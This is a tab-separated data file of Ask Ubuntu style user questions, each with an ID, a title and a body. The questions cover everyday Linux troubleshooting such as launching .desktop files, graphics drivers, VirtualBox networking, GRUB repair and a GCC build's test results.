385055	how to simulate an `` application launch '' ( executing a .desktop file ) from a script ?	this question relates back to separating the tor browser from firefox in the unity launcher ( i assume it applies to other de 's as well ) . the original question is here . as part of my proposed solution i created a .desktop file that uses a different icon and runs the tor browser as a separate process from firefox . it seems that in unity the only way to create separate entries in the launcher/dash is by using separate .desktop files ( which makes sense ) and putting them in ~./local/share/applications or /usr/share/applications . however , the problem is that , according to this , .desktop files can't/are-not-intended to be run from within a shell , but rather the de ( or something ) parses and executes the file and ties it to a particular icon , comment , etc . i want to somehow emulate that , whatever the de does to interpret a .desktop . something like : $ app-launcher -- run-desktop '/path/to/desktop.desktop' i assume things like gnome-do or synapse use something conceptually similar to my made up command above . so how can i replicate that in a script ? p.d . the best i have been able to come up with is to use xte to literally simulate pressing the super key , typing `` tor browser '' and pressing enter , as i sit and watch the dash open on its own , `` tor browser '' sluggishly type itself in and finally open the app , all while i gently sob at the horror i have created ... there has got to be a better way . : ) edit : though this question is related to the question : running a .desktop file in the terminal , it is not a duplicate . the other question establishes ( as i described in my 4th paragraph ) that there is no way to run .desktop files directly from a terminal and keep separate entries in the unity launcher , either due to a bug in xdg-open or simply because that is not what they were designed for . acknowledging that fact , this question asks for a different method for executing .desktop files from a terminal , by using the same ( or similar ) method the unity dash , gnome-do or synapse uses .
385057	multiple and selected attribute not displaying in browsers	i 've been watching html5 tutorial videos by a guy named bob tabor and have come across a little problem i just ca n't find an answer for , so i 'm sorry if i 'm asking the wrong people . i ca n't figure out if it 's a problem with the code , browser or operating system . i 'm using the `` select '' tag with the `` multiple '' attribute included . with the `` multiple '' attribute included in the `` select '' tag , `` selected '' attributes i place within the `` option '' tags do not display at all on my computer ( but displays fine without the `` multiple '' attribute ) . i 'm using chromium and firefox on ubuntu 12.04 . however , i tried exactly the same code on someone else 's computer ( google chrome on a windows os ) and it displayed perfectly . any ideas ?
385058	problems running ubuntu on asus f550c	i am fairly new to ubuntu and linux . i installed ubuntu on my asus f550c , intel i-5 , nvidia geforce 720m . there are some issues installing and configuring the graphicscard . when i install the driver ( nvidia-319 ) my screen resolution goes down to 860x648 , ca n't configure it otherwise . has anyone anny clues how to solve that ? many thanks .
385060	how to add an ftp user that does n't have access to parent dirrectories ?	i want to add user called user on my ftp server , and that user will have access on just /home/user folder ... and i want to he has n't got access in back folders , home , root and that , just /home/user but i do n't know every command . how can this be done ?
385063	`` resolve : note localhost resolve to 2 addresses '' , when using openvnp	i was just trying to fix my server.conf because it 's suddenly getting error , i was trying to replace the server.conf with the one from my other server which works fine . i 'm just copying overwrite with command cp -r [ filename ] [ destination ] but when i was trying to restart the service , it say failed , when i check openvpn.log it 's getting message like this resolve : note localhost resolve to 2 addresses it is still running as daemon , but i ca n't change the configuration , i 'm trying to kill with killall openvpn but it does n't work .
385065	attempting to install ubuntu on oracle virtual box inside win 7	after i get the ubuntu install completion message how do i shut down the virtual machine and reload so the vm will point to the new install rather than the install .iso image file ? . i flashed the bios to the latest version for my pc successfully . thanks in advance , dave
385071	virtualbox networking issues	my host machine is running windows 7 . my guest machine is running ubuntu server 12.04 . i can not figure out how to get the networking configured in virtualbox so that ubuntu can detect it . i have tried all of the options that remotely make sense in the networking menu : nat , nat network , bridged adapter , internal network . what i really want is to have bridged adapter ( because i intend for the vm to be a server ) , but when i select that and choose my network card ( realtek pcie gbe family controller ) or even the other one ( tap-win32 adapter v9 ) , ubuntu fails to recognize the network interface . the results of ifconfig -a are as follows : eth2 link encap : ethernet hwaddr 08:00:27:36:4c:1e broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) the results of ping 204.186.215.49 are as follows : connect : network is unreachable so , my question : how do i get my vm/guest configured such that i can run samba and apache such that they are accessible from my host ?
385072	how set the message of the day ( motd ) as ubuntu server ?	i have this in my ubuntu ssh banner message : welcome to ubuntu 13.10 ( gnu/linux 3.4.43+ armv7l ) * documentation : https : //help.ubuntu.com/ no mail . last login : mon dec 2 08:25:39 2013 i 'd like to have something like the standard ubuntu server : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-virtual x86_64 ) * documentation : https : //help.ubuntu.com/ system information as of fri sep 28 09:48:57 utc 2012 system load : 0.08 processes : 20 usage of / : 12.4 % of 57.97gb users logged in : 0 memory usage : 5 % ip address for eth0 : 10.123.161.58 swap usage : 0 % graph this data and manage this system at https : //landscape.canonical.com/ 31 packages can be updated . 20 updates are security updates . last login : thu sep 21 19:18:35 2012 from 122.181.4.42 how could i get this , please ? thanks in advance !
385073	ca n't remove a folder	this folder had the ubuntu 13.10 iso file . now when i try to remove it i get an error message with the detail : `` error removing file : no such file or directory '' when i try to open the folder normally through the files explorer it opens another new window that is the same as the one i 'm trying to open the folder from . this happened after i tried to create a live usb using ubuntu ( 13.10 ) startup disk creator . it could n't complete making the usb and gave errors . i also tried a terminal command with sudo and here 's what happened rmdir : failed to remove â/media/ ... / ... / ... ( the directory ) â : directory not empty
385075	azerty keyboard with ubuntu gnome 13.04	how to use an azerty keyboard with ubuntu gnome 13 04 ? i 'm using the virtual keyboard but did n't find any parameters for the real azerty keyboard . thank you for answering . felix .
385076	how to change font size using i3-wm ?	when i start ubuntu with i3-wm the font of all applications is too big . how do i change the font and size ? i already looked into i3 documentation but found nothing about this topic .
385079	reparing mbr after installing-removing hackintosh and windows	have done a lot of installs-uninstalls of different os-es and my current configuration looks like this : windows 7 linux mint when i start pc , i get directly to windows , which is normal because mbr knows nothing about linux . when i boot with partedmagic cd , i can go to extra boot options > detect grub2 cfg > select the only grub.cfg on ( sd0 , msdos5 ) and happily boot to linux ( windows option does n't exist ) . but when i try to update grub so it can be seen by mbr , i get this : update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin grub-probe : error : unknown filesystem . done after reboot , grub doesnot appear , but windows is unable to start either . how to get this fixed ? i want normal to get grub with 'normal ' startup options back . fdisk -l /dev/sda1 * 2048 143362047 71680000 7 hpfs/ntfs/exfat /dev/sda2 143362048 915329023 385983488 7 hpfs/ntfs/exfat /dev/sda3 915331070 976771071 30720001 5 extended /dev/sda5 915331072 968687615 26678272 83 linux /dev/sda6 968689664 976771071 4040704 82 linux swap / solaris
385081	how to make the window manager to draw lines instead of the windows content when moving/resizing ?	is there a way to make the window manager in gnome-session-fallback to draw lines instead of the windows content when moving/resizing ? it was possible in 12.04 , you could change the option in gconf-editor /apps/metacity . but in 13.10 i ca n't find that entry anywhere .
385082	what actions are supported by the email icon in the unity menu bar ?	well , so now that i upgraded to ubuntu 13.10 i got that email icon on the top panel , but this time , when i click on it i wo n't get stuff about thunderbird , what i get are some chat options ( availability , you know : available , busy , invisible , offline , etc . ) but those option do not seem to work with either empathy or thunderbird 's chat ( thunderbird 's chat does n't even have as many availability options ) so i have some questions about it : is it supposed to work with empathy or thunderbird 's chat ? if it is , then it 's not working properly so ... is there a way to make it work ? if it 's not supposed to work with empathy or thunderbird then ... what does it work with ? if it does n't work with anything and it just happens to be some decorative icon , how on earth do i remove it from the panel ?
385085	updating matlab version to 2013b on ubuntu 12.04	i have matlab 2012b installed and working on my ubuntu 12.04 box , i just downloaded , installed , and activated the 2013b version using the gui defaults under root priviledges , but when i start matlab from the command line , the old 2012b version pops up . how do i change matlab root from /usr/local/matlab/r2012b to /usr/local/matlab/r2013b , and delete the 2012b version , so when i type matlab in the terminal command line r2013b pops up ? ( i see that in the /usr/local/bin there is a matlab file and mex file , the latter referring to the 2012b version , but it is read only ) .
385086	alienware 14 boots into a black screen , how to fix it ?	hello i bought an alienware laptop a couple months ago and i love it and now i want to install linux since linux is gaining some gaming background but im having a problem with my installation of ubuntu . when i install and i load up ubuntu it goes black but i can still here the boot sounds . but if i plug in my hdmi cable to the tv i get the display and if i mess aroundwith the video settings i can get it to load on the commputer but if i restart i have yo redo the process mmentioned above . i want ubuntu to run perfectly with my alienware 14 graphics card is a integrated intel and a nvidia card
385087	the file or folder /home/xxx/ ... does not exist . and can not be deleted	i have a small problem with kubuntu . i can not detele some folders and files , it always says to me , the file or folder /src/ does n't exist ? and now i need to delete them , but i do n't know how . someone may help me please . regards
385089	technical . ubuntu not working	i installed ubuntu 12.04 . after restarting system i choosed to boot ubuntu . i insert my password and then , nothing happend . i could see only wallpaper and cursor . my pc is : intel celeron 3.33 ghz . ram 1512mb grafic . card hd radeon 7600 is this because i have weak computer . ( it is personal computer ) can anyone help me ? than you very much .
385090	build-essential fail . ( ubuntu 13.10 )	my build-essential command is failed . i really do n't know why and how to solve it . please help me . i am using ubuntu 13.10 , x64 . the command is this . sudo apt-get install build-essential and the result is this . reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : build-essential : depends : g++ ( > = 4:4.4.3 ) but it is not going to be installed depends : dpkg-dev ( > = 1.13.5 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . what is the problem ? help me plz ... i tried to install dpkg-dev manually , but my computer suggests to use build-essential ...
385091	usb mouse and keyboard suddenly stopped working in 13.10 .	i took a week off of work and brought my laptop with me . when i got back , the mouse and keyboard i use were n't working anymore . both devices work in my bios . the keyboard works in grub . neither works in a virtual console ( i installed gpm to check the mouse ) or in xorg . i see messages about unplugging each in dmesg . i 've tried removing all other peripherals except for each of these two input devices . lsusb lists both items : $ lsusb bus 002 device 004 : id 0a5c:5800 broadcom corp. bcm5880 secure applications processor bus 002 device 003 : id 046d : c52b logitech , inc. unifying receiver < -- - bus 002 device 006 : id 045e:00db microsoft corp. natural ergonomic keyboard 4000 v1.0 < -- - bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 1bcf:2b83 sunplus innovation technology inc . bus 001 device 003 : id 413c:8187 dell computer corp. dw375 bluetooth module bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub but hardinfo sees nothing : i 've been using linux as my primary os for ~12 years and this has me stymied . the only lead i 've got so far is that i was tinkering with grub to change my virtual terminal resolution . i saw that that affects mouse and keyboard on some systems , so i undid the changes and updated grub . i 'm still get a text grub , but i think that was the case before i made the changes . oh yeah , i 've also been having power issues . the machine does n't poweroff or reboot anymore . no idea when this started - i only noticed when i took it home . i 'm not trying to tack that on to this ticket , but am listing it as a clue on the off chance it 's related . my laptop in question is a dell e6420 .
385092	interfaces exceeds the height of the screen	i use a notebook with small screen , 1024:600 resolution with ubuntu 12.04 lts . when i try to save or open a document , the interface is exceeding the height of the screen leaving the buttons out of screen from the bottom . i know i can resize the interface but it is really bothering me to do that every single time . is there a way to change the settings for the default location and size of such interfaces universally ? this is the only real reason why i ca n't recommend ubuntu to other people who are using similar devices . it is uncomfortable . i also have a question about the versions . there is a 12.04 and 13.10 release . it says on the page 12.04 has long term support , 13.10 has support for nine months . i have to say that it is confusing to write it like this . my idea was that 13.10 is only good for nine more months . then it is garbage , history . so i installed 12.04 . should i install 13.10 ? what happens after nine months ?
385096	rm -i to prevent accidental rm	i just created alias rm= '' rm -i '' to prevent from accidental rm command . -i prompt once before removing more than three files , or when removing recursively . less intrusive than -i , while still giving protection against most mistakes but it does n't work . i do n't get any prompt when i use rm -rf
385103	windows cursor for 12.04	i am looking for a cursor that is similar to that for windows 7 . really i do n't mind the default one but the 'hand ' with the pointing finger is annoying me . is there a simple way to get rid of the 'hand ' cursor while over links ? cheers in advance .
385106	proper laptop temperature for warmer enviroment	this is my laptop on idle mode with only firefox running . enviroment temperature is up to 15-20 c. it 's an hp probook with ati hd 4330 . when i am writing codes for android with eclipse core temperatures go up to 45-50 c. my issue is that when enviroment temperature elevates at 30-35 c my laptop is burning . cpu and gpu go up to 60-70 c and 70-80 c. with win7 cpu and gpu are 10-15 c lower . will ubuntu 12.04 breakdown my hardware due to high temperatures ? thank for your time ! acpitz-virtual-0 adapter : virtual device temp1 : +65.0°c ( crit = +108.0°c ) temp2 : +44.0°c ( crit = +105.0°c ) temp3 : +41.0°c ( crit = +108.0°c ) temp4 : +44.0°c ( crit = +105.0°c ) temp5 : +20.0°c ( crit = +108.0°c ) temp6 : +35.0°c ( crit = +110.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +38.0°c ( high = +105.0°c , crit = +105.0°c ) core 1 : +37.0°c ( high = +105.0°c , crit = +105.0°c )
385112	running juju , how do you edit files ?	juju does not associate keyfiles with the instances it creates , so you can not ssh with them . i tried connecting with filezilla using port 22 ( open ) using the username juju-admin and the admin-secret found in environments.yaml and it did not work . i would like to edit some of the wordpress content files . i am running on ec2 with nfs charm associated to wordpress .
385114	wget -o command not found	this is my first day using ubuntu 12.04 . i am using ubuntu as it is the only operating system capable of hosting an app i created using the statistical software package r. i am trying to follow the ( so far very helpful ) commands given at the following site : http : //withr.me/blog/2013/07/23/configure-shiny-server-under-ubuntu/ everything runs fine until step 6 - `` install upstart script '' . sudo wget\ https : //raw.github.com/rstudio/shiny-server/master/config/upstart/shiny-server.conf\ -o /etc/init/shiny-server.conf command not found any help as to why this error message is arising would be greatly appreciated . and sorry for the newbie question . seriously only using linux for a few hours .
385118	ca n't install fglrx driver for amd hd8250	i 've installed 12.04 on my samsung ativ 9 lite and failed to install fglrx driver . i tried the following : https : //help.ubuntu.com/community/binarydriverhowto/ati # installing_via_the_command_line but it fails and reports a problem . what to do ?
385120	can not access internet until visited once in an ip with browser , dns-problem ?	just installed kubuntu 12.04 on acer aspire 5738zg . wireless hw : lspci -k 03:00.0 network controller : qualcomm atheros ar928x wireless network adapter ( pci-express ) ( rev 01 ) subsystem : foxconn international , inc. t77h047.31 802.11bgn wireless half-size mini pcie card [ ar9283 ] kernel driver in use : ath9k kernel modules : ath9k tried using network-manager in the beginning , then replaced it with wicd , back with network-manager again ( though missing the status icon and if i run nm-applet then the icon will appear twice ) . here 's my /etc/resolv.conf : nameserver 8.8.8.8 nameserver 156.154.70.1 nameserver 208.67.222.222 search home.gateway the problem is that i can browse the internet only after i 've visited an ip , like ( http : // ) 173.194.40.241 ( www.google.com ) - after this everything works great.. but why does n't it work right away - what must i do ? pinging the gateway ( router ) ip : 192.168.0.254 or www.google.com ( or the ip ) fails until i visit the ip with my web browser beforehand , which magically makes the pinging successful . ip-configuration seems to be ok : ifconfig eth0 link encap : ethernet hwaddr 00:26:2d:79 : f7:7c up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr c4:17 : fe:17 : fa:63 inet addr:192.168.0.103 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :c617 : feff : fe17 : fa63/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1536 errors:0 dropped:0 overruns:0 frame:0 tx packets:1600 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:947070 ( 947.0 kb ) tx bytes:299593 ( 299.5 kb ) i 've also added this configuration but i 'm unsure whether it is needed or not : cat /etc/modprobe.d/ath9k.conf options ath9k nohwcrypt=1 update 2013-12-06 the nohwcrypt=1 does not seem to be necessary , though many sources around the internet recommend it . i currently have the additional name servers configured , but there probably is no need for them either . i have not made any additions to the /etc/modprobe.d/blacklist.conf , many sources around the internet suggest putting acer_wmi there , but for me the command rfkill list does not display anything as blocked .
385121	installing bumblebee on 13.10 for my 635m nvidia / 4000m intel is breaking x and putting me in low graphics hell . please help	today 's date is dec 2 , 2013 i have an asus r500vj ( aka k55vj ) - with an ivybridge 4000m intel and a nvidia 635m . lately every time i use the installation method prescribed on the official bumblebee `` ask '' it breaks my x configuration and puts me in low graphics hell . i 'm some what savvy with linux , but only enough to damage my install . i 've got this to work in the past but have n't had the time to do the reading . links : https : //launchpad.net/~bumblebee/+archive/stable https : //wiki.ubuntu.com/bumblebee # a.22cannot_access_secondary_gpu.22_error oddly enough i 've got this to work in the past but have n't had the time . this is annoying ... . please help . i 'm probably forgetting to modify something . i 've been reading , but i ca n't get any alone time to work though these issues . gf is super prego and wo n't stop interrupting everything i do . a helpful answer would really remove a lot of my stress . here is what i 've ran in the past sudo apt-get install bumblebee bumblebee-nvidia primus linux-headers-generic also for some reason i 'm always missing glxgears and glxspheres ... . they just seems not to be there and i have a feeling installing mesa-utils is messing with steam and causing it to throw an error . but again that only installs gears and not spheres . cheers , j
385124	black screen after upgrading ubuntu	after updating and then upgrading ubuntu from 12.04 to 12.10 the following is happening . ubuntu will load a black screen initially without any imput cursor flashing or anything , the ubuntu load screen however shows up for a few seconds now rebooting from this state brings up the grub loader and after selecting ubuntu 12.10 it takes me to the console , the error : @ wlc_cfg80211_scan wlc_scan error -22 is displayed on the screen repeatadley at intervals now after logging in i tried setsid unity with the warning no display variable set also unity-panel-service : no process found then compiz will fail - 'couldnt open display' i tried some other stuff like startx which gives a fatal error no screen found , im using a dell vostro 1510 with a usb wireless internet connection as well as ethernet
385125	append entry widget to appindicator pygtk	i 'm using python+pygtk , is there any way to append entry widget to appindicator ? there is appindicator called `` synapse indicator '' that has text widget in its appindicator .
385126	shift key transposing some characters in 13.10	i am suddenly encountering problems with the shift key selecting the wrong character ( although most are working as normal ) while using the english ( uk ) keyboard . for example using shift + `` is resulting in @ being typed and conversely using shift + @ is resulting in `` being typed . certain other keys are similarly affected including \ replacing # ( this is without using shift ) and \ key results in > being produced . some characters such as the english pound sign seem to have disappeared altogether ( hence my being unable to produce it here ) . this seems to be a recent problem which i do n't recall occurring when i first upgraded to 13.10 . is there any fix for this ?
385127	how to verify a manual build of gcc-4.8.2 on ubuntu 12.04 ?	after getting the latest gcc-4.8.2 from one of the gcc mirrors , i issued the following commands as a mere mortal : ./gcc-4.8.2/configure -- enable-languages=ada , c , c++ , fortran make ulimit -s 32768 make -k check i was going to run make install , but i saw something at the end of make -k check that concerned me : vis : make : *** [ do-check ] error 2 make : target `check ' not remade because of errors . alas , when i scroll up , i can not find the error output that would explain this last statement . here is the output from test_summary : === acats tests === === acats summary === # of expected passes 2320 # of unexpected failures 0 native configuration is x86_64-unknown-linux-gnu === gcc tests === running target unix === gcc summary === # of expected passes 93833 # of expected failures 261 # of unsupported tests 1371 /home/ted/gcc-build/gcc/xgcc version 4.8.2 ( gcc ) === gfortran tests === running target unix fail : gfortran.dg/guality/pr41558.f90 -o0 line 7 s == 'foo' fail : gfortran.dg/guality/pr41558.f90 -o1 line 7 s == 'foo' fail : gfortran.dg/guality/pr41558.f90 -o2 line 7 s == 'foo' fail : gfortran.dg/guality/pr41558.f90 -o3 -fomit-frame-pointer line 7 s == 'foo' fail : gfortran.dg/guality/pr41558.f90 -o3 -fomit-frame-pointer -funroll-loops line 7 s == 'foo' fail : gfortran.dg/guality/pr41558.f90 -o3 -fomit-frame-pointer -funroll-all-loops -finline-functions line 7 s == 'foo' fail : gfortran.dg/guality/pr41558.f90 -o3 -g line 7 s == 'foo' fail : gfortran.dg/guality/pr41558.f90 -os line 7 s == 'foo' === gfortran summary === # of expected passes 43596 # of unexpected failures 8 # of expected failures 42 # of unsupported tests 69 /home/ted/gcc-build/gcc/testsuite/gfortran/../../gfortran version 4.8.2 ( gcc ) === g++ tests === running target unix === g++ summary === # of expected passes 54194 # of expected failures 290 # of unsupported tests 890 /home/ted/gcc-build/gcc/testsuite/g++/../../xg++ version 4.8.2 ( gcc ) === gnat tests === running target unix === gnat summary === # of expected passes 1175 # of expected failures 17 # of unsupported tests 2 /home/ted/gcc-build/gcc/gnatmake version 4.8.2 === libatomic tests === running target unix === libatomic summary === # of expected passes 54 === libgomp tests === running target unix === libgomp summary === # of expected passes 3007 === libitm tests === running target unix === libitm summary === # of expected passes 26 # of expected failures 3 # of unsupported tests 1 === libmudflap tests === running target unix fail : libmudflap.c++/pass41-frag.cxx ( -o ) execution test fail : libmudflap.c++/pass41-frag.cxx ( -o2 ) execution test fail : libmudflap.c++/pass41-frag.cxx ( -o3 ) execution test === libmudflap summary === # of expected passes 1433 # of unexpected failures 3 === libstdc++ tests === running target unix === libstdc++ summary === # of expected passes 8642 # of expected failures 45 # of unsupported tests 527 compiler version : 4.8.2 platform : x86_64-unknown-linux-gnu configure flags : -- enable-languages=ada , c , c++ , fortran does the output above provide the information to explain what went awry during the make -k check command ? if so , i 'd like to understand ... if you obtained the above output , would you feel confident enough in the build of gcc to proceed with installing it and using it , even in a production environment ? note , there are a number of sections that are a complete mystery to me . for example , i have no idea what acats is , or mudflap or itm or gomp . one last question about the output from test-summary . right after the above output , i saw the following : mail -s `` results for 4.8.2 testsuite on x86_64-unknown-linux-gnu '' gcc-testresults @ gcc.gnu.org & & mv /home/ted/gcc-build/./gcc/testsuite/ada/acats/acats.sum /home/ted/gcc-build/./gcc/testsuite/ada/acats/acats.sum.sent & & mv /home/ted/gcc-build/./gcc/testsuite/gcc/gcc.sum /home/ted/gcc-build/./gcc/testsuite/gcc/gcc.sum.sent & & mv /home/ted/gcc-build/./gcc/testsuite/gfortran/gfortran.sum /home/ted/gcc-build/./gcc/testsuite/gfortran/gfortran.sum.sent & & mv /home/ted/gcc-build/./gcc/testsuite/g++/g++.sum /home/ted/gcc-build/./gcc/testsuite/g++/g++.sum.sent & & mv /home/ted/gcc-build/./gcc/testsuite/gnat/gnat.sum /home/ted/gcc-build/./gcc/testsuite/gnat/gnat.sum.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libatomic/testsuite/libatomic.sum /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libatomic/testsuite/libatomic.sum.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libgomp/testsuite/libgomp.sum /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libgomp/testsuite/libgomp.sum.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libitm/testsuite/libitm.sum /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libitm/testsuite/libitm.sum.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libmudflap/testsuite/libmudflap.sum /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libmudflap/testsuite/libmudflap.sum.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libstdc++-v3/testsuite/libstdc++.sum /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libstdc++-v3/testsuite/libstdc++.sum.sent & & mv /home/ted/gcc-build/./gcc/testsuite/ada/acats/acats.log /home/ted/gcc-build/./gcc/testsuite/ada/acats/acats.log.sent & & mv /home/ted/gcc-build/./gcc/testsuite/gcc/gcc.log /home/ted/gcc-build/./gcc/testsuite/gcc/gcc.log.sent & & mv /home/ted/gcc-build/./gcc/testsuite/gfortran/gfortran.log /home/ted/gcc-build/./gcc/testsuite/gfortran/gfortran.log.sent & & mv /home/ted/gcc-build/./gcc/testsuite/g++/g++.log /home/ted/gcc-build/./gcc/testsuite/g++/g++.log.sent & & mv /home/ted/gcc-build/./gcc/testsuite/gnat/gnat.log /home/ted/gcc-build/./gcc/testsuite/gnat/gnat.log.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libatomic/testsuite/libatomic.log /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libatomic/testsuite/libatomic.log.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libgomp/testsuite/libgomp.log /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libgomp/testsuite/libgomp.log.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libitm/testsuite/libitm.log /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libitm/testsuite/libitm.log.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libmudflap/testsuite/libmudflap.log /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libmudflap/testsuite/libmudflap.log.sent & & mv /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libstdc++-v3/testsuite/libstdc++.log /home/ted/gcc-build/./x86_64-unknown-linux-gnu/libstdc++-v3/testsuite/libstdc++.log.sent & & true what , exactly , is that doing , and why ?
385128	ubuntu 12.04 gnome classic ( fallback ) panel auto-hide delay	apparently , gnome-panel in fallback on 12.04 has an autohide-delay maximum of 10000 . i want it to never auto-hide to behave more like a `` wing panel . '' this was possible in previous versions of gnome . any fix ?
385129	how can i install a ftp client without having an internet connection ?	i 'm currently working on configuring a server with vsftpd . i managed to do this and it works fine . now i need to allow a client to retrieve files from the server . to do this i need to install ftp on the client . when i run sudo apt-get install ftp i get an error saying it is unable to fetch some archives . it seems the client has no internet connection . i tried to ping google.com and it failed . has anyone any suggestions to how to check and fix my internet connection ?
385130	wine wont play company of heros correctly	so i installed wine the windows program runner and i tried to play the game ( company of heroes 2 ) and it will start up and will start to load the map when it fails and gives me a wine warning message . please help
385131	vgaswitcheroo on desktop	i 'm using a desktop setup with ivy bridge motherboard , monitor connected with thunderbolt and switching to discrete gpu with the commercial product lucidlogix virtu on windows . are there any implementations for linux which could do that on the desktop ? not sure what the hardware does in this case and how much it is different to the laptop solutions . anyone ?
385133	how to update flash in chromium ?	i thought linux was n't getting any new updates from adobe ? but i started to get this message a few days ago on youtube and other flash sites : when trying to install the update i get to a page which only offers yum , .tar.gz , and .rpm and none .deb could someone guide me trough installing this ?
385135	recovery mode - mountall is n't bypassed	ubuntu 13 x64 i get to recovery mode via grub , which shows : linux /boot/vmlinuz-2.6.32-53-generic root=uuid=4a08b936-569c-4ba6-9\607-00d05f121917 ro single however , when i choose to boot into this mode , the system hangs at : mount.nfs : connection timed out mountall : mount /usr/local/backups [ 759 ] terminated with status 32 it will continue to repeat this if left alone ... i was under the impression that single user mode would bypass mount attempts ; how do you tell the system not to attempt to execute the mountall command ? clearly , i need to solve the nfs problem , but if i ca n't get the machine to boot i 'm at a disadvantage . this is a virtual machine instance , so running a livecd does n't appear to be an option .
385139	wireless driver issue slowing and sometimes freezing pc on start up	can anyone tell me how to remove this start up error message or fix it ? lspci : 12:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) currently when i boot up my laptop which is a : dell inspiron n5010 4gb ram and 500gb hdd i get the bios then a black screen , then off screen then this : [ 9.625943 ] support for cores revisions 0x17 and 0x18 disabled by module param allhwsupport=0 . try b43.allhwsupport=1 whole dmesg here : http : //pastebin.com/tdhmgab4 and so i think this has to do with my broadcom wireless driver : this is a screen cap : http : //i.stack.imgur.com/2xvcb.png so when i activated this driver , my startup behavior became more erratic and glitchy , i almost always had to hard reboot . so i turned it off , it 's currently as the above image . i got errors like this at start up : [ 8.576340 ] wl : module license 'mixed/proprietary ' taints kernel . [ 8.576350 ] disabling lock debugging due to kernel taint [ 8.578156 ] wl : module verification failed : signature and/or required key missing - tainting kernel [ 8.612820 ] info @ wl_cfg80211_attach : registered cfg80211 phy [ 8.657103 ] [ drm ] memory usable by graphics device = 2048m [ 8.657113 ] i915 0000:00:02.0 : setting latency timer to 64 [ 8.661676 ] lib80211_crypt : registered algorithm 'tkip' [ 8.684710 ] i915 0000:00:02.0 : irq 47 for msi/msi-x [ 8.684722 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 8.684723 ] [ drm ] driver supports precise vblank timestamp query . [ 8.684799 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 8.723425 ] eth1 : broadcom bcm4727 802.11 hybrid wireless controller 6.20.155.1 ( r326264 ) full dmesg here : ( i have the link , could n't post b/c rep , idk if it would 've been helpful ) i am an inexperienced ubuntu user , i 'm not dualbooting it 's just 12.04 the lts on my laptop , i used to dualboot windows 7 but dban 'd my hdd and clean installed ubuntu 12.04.1 would i like , clean up my drivers in recovery mode and try installing again ? or is the proprietary driver the issue ? help , please , thank you .
385140	how do i use a block device its not appearing in file system	my block device does n't appear in system files . it shows like a gray block . i need help im a ubuntu noob first time using it . i installed it after windows crashed and never worked again .
